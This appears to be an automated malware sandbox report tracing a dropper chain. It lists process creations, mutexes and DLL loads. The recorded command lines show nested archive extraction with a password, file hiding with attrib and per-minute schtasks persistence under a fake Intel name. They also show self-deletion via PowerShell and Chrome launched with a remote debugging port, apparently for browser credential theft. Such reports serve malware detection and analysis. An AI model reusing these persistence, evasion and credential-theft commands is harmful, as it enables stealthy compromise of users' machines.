Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Command line argument: .0		12_2_0030E280
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Command line argument: .0		14_2_0030E280

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 3a1a782de7.exe, 0000000E.00000003.1937462126.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1937946717.00000000035AA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 4ec75545d6.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe"
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 652
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe "C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe "C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe"
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,16473332069904579235,14265532122417200322,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe "C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe "C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,16473332069904579235,14265532122417200322,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Section loaded: sspicli.dll	Jump to behavior
